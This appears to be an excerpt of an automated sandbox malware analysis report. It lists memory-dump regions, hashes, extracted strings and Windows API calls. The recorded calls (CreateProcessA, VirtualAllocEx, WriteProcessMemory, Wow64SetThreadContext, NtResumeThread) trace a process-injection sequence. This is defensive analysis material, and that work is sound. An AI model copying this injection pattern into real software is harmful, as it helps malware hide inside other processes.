                          • Opcode ID: bd50ba7a27f1356534f36d5f7c89dcee1a4054dc40f685c9a05eddcf314c7939
                          • Instruction ID: 4f55cd97dcb1a2ff654e77d520de0e4e71833f8ac61c1ae85e9aebeda6821591
                          • Opcode Fuzzy Hash: bd50ba7a27f1356534f36d5f7c89dcee1a4054dc40f685c9a05eddcf314c7939
                          • Instruction Fuzzy Hash: 57D16D35E1152A8FDB54DF79D880AAEB7F2BFC8300F158669D409EB359DB30A941CB90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 0ca827bb9a2376edd47642de85409cbeaead2e7d6e287bbebbfd15784c72f048
                          • Instruction ID: 10fb2789d1561f4e4bd17593a30b5464a39942e30b45e8a179bcce1386dc7342
                          • Opcode Fuzzy Hash: 0ca827bb9a2376edd47642de85409cbeaead2e7d6e287bbebbfd15784c72f048
                          • Instruction Fuzzy Hash: 85A128B0E00609CFE748EFAAE8846AEBBF6EFC5304F14C569D405AB269DB741945CF41

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: $vW+`
                          • API String ID: 0-2655680021
                          • Opcode ID: 5308d41988c6602089b825b9de5d22d7126e5bb197f3099400fed9b205bdbb19
                          • Instruction ID: a82233c9bb853667be90aa4f60136385e6f50de32a0f75d913061306621f253d
                          • Opcode Fuzzy Hash: 5308d41988c6602089b825b9de5d22d7126e5bb197f3099400fed9b205bdbb19
                          • Instruction Fuzzy Hash: 8E51C071B101568FCB14CBACD885AAEBBF2EBC8215B158579E509DB349DB30EC518B80
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05A915AD
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 12a7f88969c77c0105b0b55a40e77d575f8ba2cc56894d7be7fa284e1d44ca4f
                          • Instruction ID: f2b7e3527795c57109f6609f88bea4b73ded8ffc48fc3ddd7671cbdc2136c0eb
                          • Opcode Fuzzy Hash: 12a7f88969c77c0105b0b55a40e77d575f8ba2cc56894d7be7fa284e1d44ca4f
                          • Instruction Fuzzy Hash: 744197B9D002589FCF10CFAAD980ADEFBB1FB59310F10902AE815B7200D735A941CF64
                          APIs
                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05A915AD
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: f09759778546b2a7a1a456018d9d91b9cedcbaaa8ff00c14ececcef98f9fe3d5
                          • Instruction ID: 5b81b88bea6dfed9378f787f176168ee76f8e096a20bd78abd544280948f8928
                          • Opcode Fuzzy Hash: f09759778546b2a7a1a456018d9d91b9cedcbaaa8ff00c14ececcef98f9fe3d5
                          • Instruction Fuzzy Hash: C94187B9D002599FCF14CFAAD980ADEFBB5FB59320F10902AE819B7210D735A945CF64
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 05A92ABE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: c7b6fa81f1f9a403bdf7a11e3b7616800913a25f67397bfa0e66ae60a35cce9d
                          • Instruction ID: d2ce11c11752e78ec261b11384444d07baff4afe9ca83eafc387e43db3e3277d
                          • Opcode Fuzzy Hash: c7b6fa81f1f9a403bdf7a11e3b7616800913a25f67397bfa0e66ae60a35cce9d
                          • Instruction Fuzzy Hash: C53198B9D012189FCB14CFA9D980A9EFBF5FF49310F14942AE815B7200C735A945CF94
                          APIs
                          • NtResumeThread.NTDLL(?,?), ref: 05A92ABE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 201ca8627da5fe30fce748290dc84dcff1a087ef3aad59c3b1fa90f4be6ba777
                          • Instruction ID: 43d0687b94ebe1a3e872b1f9d54cc87880f2147fd7a13ec5daac40ee627a02c4
                          • Opcode Fuzzy Hash: 201ca8627da5fe30fce748290dc84dcff1a087ef3aad59c3b1fa90f4be6ba777
                          • Instruction Fuzzy Hash: 7D31A8B9D012189FCF14CFA9E980AAEFBF1BF58310F24942AE815B7210D775A945CF94
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dlq
                          • API String ID: 0-3914526553
                          • Opcode ID: 760d5de317316b33e2f6b63083ad04e29fbc90909c36e6936e6c74e1d2f45a5e
                          • Instruction ID: 5cd45f69b126772956e2e8a4ef190aa78753dd7b74fc41e81fa7a0b42da0d09c
                          • Opcode Fuzzy Hash: 760d5de317316b33e2f6b63083ad04e29fbc90909c36e6936e6c74e1d2f45a5e
                          • Instruction Fuzzy Hash: CED19374E01218CFDB54DFA9D994A9DBBB2FF89300F1081AAD409AB365DB31AD81CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: 497e283f582b4e87fbb6a69311adb61af241a8da08383235d7e61226383f4217
                          • Instruction ID: f15d6e97d3032cf71438df1839bdfb06a388570698fbe85e64a5d8c7b9955502
                          • Opcode Fuzzy Hash: 497e283f582b4e87fbb6a69311adb61af241a8da08383235d7e61226383f4217
                          • Instruction Fuzzy Hash: 5F8109B8E5020A9FDF14CFA9D980AAEBBF1BF48314F10A555D416EB294DB319A41CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6535f4b2fdd662a41f10521d763a51481ba105663cc423b21d4342d97aab5f78
                          • Instruction ID: 33c8dc8b6d9638dd1d1c2b992a7d240488b77122c980412d5c7a96d388bb6902
                          • Opcode Fuzzy Hash: 6535f4b2fdd662a41f10521d763a51481ba105663cc423b21d4342d97aab5f78
                          • Instruction Fuzzy Hash: 0B815F36F206259FC754DBA9D880E9EB7E3AFD8711F1A8164E405DB369DB70AC018B90

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: (iq$(iq$(iq$(iq$(iq
                          • API String ID: 0-3102978658
                          • Opcode ID: 8013861e25baed894e86fef2de1d32b329ce3a46a104816b4cccbae949112003
                          • Instruction ID: 2c9b8a5a8bb8f9c1858d90838842c1618c762630f5a64303a409b05fb1f5e815
                          • Opcode Fuzzy Hash: 8013861e25baed894e86fef2de1d32b329ce3a46a104816b4cccbae949112003
                          • Instruction Fuzzy Hash: C3B120327146558FDB14DF68D840AAE3BE6EFC4310B1980AAE905CB396CF35DC46CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 711c8356802337eeaab9937d5d3d0e61f6580721d507118cd0ff49e8a99b7a5f
                          • Instruction ID: ddcd491c077dd419a9de9607e58728b785a6982c780a0675615ce099671c38ac
                          • Opcode Fuzzy Hash: 711c8356802337eeaab9937d5d3d0e61f6580721d507118cd0ff49e8a99b7a5f
                          • Instruction Fuzzy Hash: 69D2AB74909348DFDB16CBA4CD99BAE7FB5FF06300F1494AAE101AB2E2C7785845CB61

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq$4'eq
                          • API String ID: 0-907361030
                          • Opcode ID: 28ed314c29c975a4a0d65ac07b46c9d728007181ae91658ad8068e87c3d2853e
                          • Instruction ID: f93fd73beec23ba9eaf015dd0831af8265c85928d786a614eb753cf533324522
                          • Opcode Fuzzy Hash: 28ed314c29c975a4a0d65ac07b46c9d728007181ae91658ad8068e87c3d2853e
                          • Instruction Fuzzy Hash: B2F1E534E05218DFCF18DFA4E9886ADBBB6FF89311F20592AE406A7390DB355981DF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: a$l
                          • API String ID: 0-62436560
                          • Opcode ID: 59710495980417b77053548cd7b290871c4ddc1afae7c3d8b9048e2ba22ceef6
                          • Instruction ID: 39c543fb6a129c1c34c67f73bf20e416579c0363e46fc56129627bd590191655
                          • Opcode Fuzzy Hash: 59710495980417b77053548cd7b290871c4ddc1afae7c3d8b9048e2ba22ceef6
                          • Instruction Fuzzy Hash: D711D774A00229CFCB64EF58DC89B9DBBB2EB88309F1144E5D419A3340DB359EC99F11
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: 81be05c7b6e132e55a9777cd20684786820807044dea44f5aeb46fee7b761d2e
                          • Instruction ID: 9c9cf2c9279618a9aa040d54106de6561fd722767d5f545ba6c9a76cd406a503
                          • Opcode Fuzzy Hash: 81be05c7b6e132e55a9777cd20684786820807044dea44f5aeb46fee7b761d2e
                          • Instruction Fuzzy Hash: 9212E6B594E3889FD7168B78CD59BAA3FB4AF13300F1944EAE144DB2E2C6785844CB71
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A92007
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 151352da26dbc191e6d5d6eabf0144b5d3edf2d29834a4a029c2218281662b12
                          • Instruction ID: 44802ea5eb4cd8e0910947af10f0bb280a0bf0bd9422a6db80aa2d965f685906
                          • Opcode Fuzzy Hash: 151352da26dbc191e6d5d6eabf0144b5d3edf2d29834a4a029c2218281662b12
                          • Instruction Fuzzy Hash: EAA1F174D002299FDF24CFA9C885BEEBBF1BF09310F14916AE859A7280DB748985CF51
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A92007
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 734f0114f01e6d1a09969e3fd9da370a4e38ca94aa743926de5e40c1711663f5
                          • Instruction ID: 9f2286c7272f9b4733031fc468ec193c10c95d98b1dbbd3461a9e2aa0276dc76
                          • Opcode Fuzzy Hash: 734f0114f01e6d1a09969e3fd9da370a4e38ca94aa743926de5e40c1711663f5
                          • Instruction Fuzzy Hash: 08A10174D002299FDF24CFA9C885BEEBBF1BF09310F14916AE859A7240DB748985CF41
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A928EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 6449470c0b8ace70ad888cb25d8d746737433420e15b62ddf7b1d32dac750fcf
                          • Instruction ID: 39774ea9a9b51ae9e350ea031b8d4d0ce20d95b61c1b331c319f01b86193c675
                          • Opcode Fuzzy Hash: 6449470c0b8ace70ad888cb25d8d746737433420e15b62ddf7b1d32dac750fcf
                          • Instruction Fuzzy Hash: C54199B9D012589FCF04CFA9D984AEEFBF1BF49310F14902AE819B7250D735AA45CB64
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A928EB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: a542ccf7058a2ec0c44b4569fabd1660dc78976078f4b5d70b57275244f33d3d
                          • Instruction ID: f25b7945454a331132cde65de8a236a5cd6639f037e23f687e400b8942f70dd2
                          • Opcode Fuzzy Hash: a542ccf7058a2ec0c44b4569fabd1660dc78976078f4b5d70b57275244f33d3d
                          • Instruction Fuzzy Hash: 924199B9D002589FCF04CFA9D984AEEBBF1BF49310F24942AE819B7250D735AA45CF54
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A92762
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: e7753eec5489c575ecda6ed9942a3f73807bad364edd8a14bb6cd24167478edf
                          • Instruction ID: 604ab31828adfbae568ee805471b7f44c2ff79f416ef9f482b4ef62f5900dd54
                          • Opcode Fuzzy Hash: e7753eec5489c575ecda6ed9942a3f73807bad364edd8a14bb6cd24167478edf
                          • Instruction Fuzzy Hash: EB3195B9D002589FCF14CFA9D980A9EFBB5FF59320F10A42AE815B7210D735A945CF64
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05A92DAC
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 48dbfbf6f7819809b44119c8799d0a61ed62d9c12eb8071bf45ab156740e4054
                          • Instruction ID: 5059eaa5908f7987690a90fc09672648562f360dc18218bb43daaa969a20d9e3
                          • Opcode Fuzzy Hash: 48dbfbf6f7819809b44119c8799d0a61ed62d9c12eb8071bf45ab156740e4054
                          • Instruction Fuzzy Hash: 5B31D9B8D042589FCF14CFA9D884AEEFBF1AF49320F14902AE815B7200D739A945CF64
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A92762
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 7c85f14e737dffb10723a9f247f2713a778f076d938fd95cc6d60c116978fa09
                          • Instruction ID: 79a06dfe0ea523cd972ca1b7c9ed30f62fc4242abc5916bea8471b680588c01d
                          • Opcode Fuzzy Hash: 7c85f14e737dffb10723a9f247f2713a778f076d938fd95cc6d60c116978fa09
                          • Instruction Fuzzy Hash: BE3195B9D00258DFCF14CFA9D980AAEBBB1BF59320F14A42AE815B7210D735A945CF58
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05A92DAC
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 9ed1c164f06b6a696247fbf497f94ffad27d1e767c12d2ba0d8488010b6ae993
                          • Instruction ID: d70c27d41957ce6ea0592b29d02fd1415678a373fb466a17355c7bca54d6ecda
                          • Opcode Fuzzy Hash: 9ed1c164f06b6a696247fbf497f94ffad27d1e767c12d2ba0d8488010b6ae993
                          • Instruction Fuzzy Hash: EF31B8B9D042589FCF14CFAAD984AEEFBF1AF49320F14902AE815B7210D735A945CF64
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B6DB74
                          Memory Dump Source
                          • Source File: 00000003.00000002.2255252953.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 8624a9453163f14d5dad7c6e6171494bd419d1daefcab776dd8b72a0fef2dede
                          • Instruction ID: 330dcf65cd6cee8fcb45b51c0e9b389bb693189d5c51657fd1a205710f8ade2b
                          • Opcode Fuzzy Hash: 8624a9453163f14d5dad7c6e6171494bd419d1daefcab776dd8b72a0fef2dede
                          • Instruction Fuzzy Hash: B431A7B9E002089FCF10CFA9D980A9EFBB1FF49320F14942AE815B7210D735A945CF54
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05A92207
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 575436f17fe486dfada9aad28f1165e6bf1397287f55927f1fc2bdcb1f3f10df
                          • Instruction ID: f2ec30b8b40f4aa3fc4ca6db6f512c316417b265fe216e92cd2622cdf577f5e8
                          • Opcode Fuzzy Hash: 575436f17fe486dfada9aad28f1165e6bf1397287f55927f1fc2bdcb1f3f10df
                          • Instruction Fuzzy Hash: 1D319BB5D012589FCB14CFAAD984AEEFBF1BF49310F24802AE419B7240D779A985CF54
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05A92207
                          Memory Dump Source
                          • Source File: 00000003.00000002.2254271158.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a90000_Gydvapkca.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 4749cba5f279d1f50632a31bf296c88e8d17abaecd628ef30edbba9bab68d92e
                          • Instruction ID: 12bd5135c17225f1dc7d6f1cbf6ffd7c2e63959d42eb38a47f5114893a4cebec
                          • Opcode Fuzzy Hash: 4749cba5f279d1f50632a31bf296c88e8d17abaecd628ef30edbba9bab68d92e
                          • Instruction Fuzzy Hash: 2241A9B9D00258DFDB14CFA9D984AAEFBF1BF48310F24802AE419B7250D778A985CF54
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2253351330.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: 628f92b7979f5c545d92a26b248b60fbb762ec6f094429405697863331a837b6
                          • Instruction ID: 8584eacf46d518df107112f1c00066b826378099fcf1daacde78cba7cb71d3b5
                          • Opcode Fuzzy Hash: 628f92b7979f5c545d92a26b248b60fbb762ec6f094429405697863331a837b6
                          • Instruction Fuzzy Hash: 13C116B590A388DFD716CB78CD59BAE3FB4AF13300F1944A6E144EB2E2C6785845CB61
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: \seq
                          • API String ID: 0-3382732615
                          • Opcode ID: 29399a8bca181ac56a24bf9074e2225f99903d11d6133d393163609f80a2e093
                          • Instruction ID: 044f47b7392c14645486d442e9b2fef1afc553f3072f581cc361da05a48882ac
                          • Opcode Fuzzy Hash: 29399a8bca181ac56a24bf9074e2225f99903d11d6133d393163609f80a2e093
                          • Instruction Fuzzy Hash: 505137B8E5020A9FDF04CFA9D980AEEBBF1BF88310F10A559D405EB255DB319A45CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: f3dc308a8c11be711e404029756663fa6ec3b69ae0472858778089e63af5202d
                          • Instruction ID: 83cd440fef5c6b7d0358abb5c2eea2aa4a07f472beed4aab5bc191955d21b2fb
                          • Opcode Fuzzy Hash: f3dc308a8c11be711e404029756663fa6ec3b69ae0472858778089e63af5202d
                          • Instruction Fuzzy Hash: 54519E719092958FDB02CF68C894A99BFF1EF5A310B0A81C6D441EF2A7D7348D85CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: b027466e0a152cfa8724a3ffd025d7237c20bd9ff6702c65ea5d3a2a50c2b997
                          • Instruction ID: 4762c25997a2e334556037423df67cb6bc1d6c9ff1635271ff11bc33a9bc20cf
                          • Opcode Fuzzy Hash: b027466e0a152cfa8724a3ffd025d7237c20bd9ff6702c65ea5d3a2a50c2b997
                          • Instruction Fuzzy Hash: 6D411775A101088FDB04DFA9C484AAEBBF6FF88710F1584A5E905EB365D734ED81CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2256339033.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5dd0000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'eq
                          • API String ID: 0-1552367303
                          • Opcode ID: f7848bfcfd4515447417ecf2180522f002fe0485bf35a5502204ba1931580f98
                          • Instruction ID: 26e0bd388fcd4e482e8d96bfd82ad22e54f416c8a3c1a80c6efba061149ca7f5
                          • Opcode Fuzzy Hash: f7848bfcfd4515447417ecf2180522f002fe0485bf35a5502204ba1931580f98
                          • Instruction Fuzzy Hash: E8313D753006109FD308EB68C495B2A77E6EFC8704F214469E60ACB3A6DE71EC4187A1
                          APIs
                          • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 05B6ED37
                          Memory Dump Source
                          • Source File: 00000003.00000002.2255252953.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_Gydvapkca.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 51aea677ff537a8172f6bba1856ea165b71475ffeabdf304a12eb7a7ccd20a74
                          • Instruction ID: 04afa670579133d02e0ccbfaac09d092563221a3a6f79d5cf127bf453cc352f3
                          • Opcode Fuzzy Hash: 51aea677ff537a8172f6bba1856ea165b71475ffeabdf304a12eb7a7ccd20a74
                          • Instruction Fuzzy Hash: B531A7B9D002189FCF10CFA9D880A9EFBB5EF49320F14942AE815B7210DB35A945CF94
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID: <d|q
                          • API String ID: 0-1894747305
                          • Opcode ID: 44021341f1910d8264634d9e308377d52b451ee41e818b200cef99cc6a47c525
                          • Instruction ID: d4dba2c1a297ae83da419ad8de9230cb3b3af8347500e7805655368e71b29758
                          • Opcode Fuzzy Hash: 44021341f1910d8264634d9e308377d52b451ee41e818b200cef99cc6a47c525
                          • Instruction Fuzzy Hash: 1F31D175A002098FDB04CFA9C584AADBBF2FF58310F258495D845EB266D735ED82CFA0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2183c01797ad514d044d53f0e2ee62cd2a804faf1cce86e8a2c73f3c693ea6ea
                          • Instruction ID: 5bdde0cd8e9ec880190a4910d2986a81b3a8fb6dd5c2c69a4b6f6e958015f6f9
                          • Opcode Fuzzy Hash: 2183c01797ad514d044d53f0e2ee62cd2a804faf1cce86e8a2c73f3c693ea6ea
                          • Instruction Fuzzy Hash: 07812775A10619CFCB14DFA8C584E9EBBF5FF98310B1580A9E8169B364DB31ED42CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2224336190.0000000002210000.00000040.00000800.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2210000_Gydvapkca.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2a66f68a8c5d33dd5523782382f64eb8e7eb54688066034dc894da07f981764
                          • Instruction ID: 55fe083542e955d78df442bf6617a9f37b45476f94df30eefe496148cb0b1724
                          • Opcode Fuzzy Hash: b2a66f68a8c5d33dd5523782382f64eb8e7eb54688066034dc894da07f981764
                          • Instruction Fuzzy Hash: EE5127B1D19245CFE706DBA8C8C4B997FF1EF66308F0984E6D4409B256D7784808CF56
                          Memory Dump Source
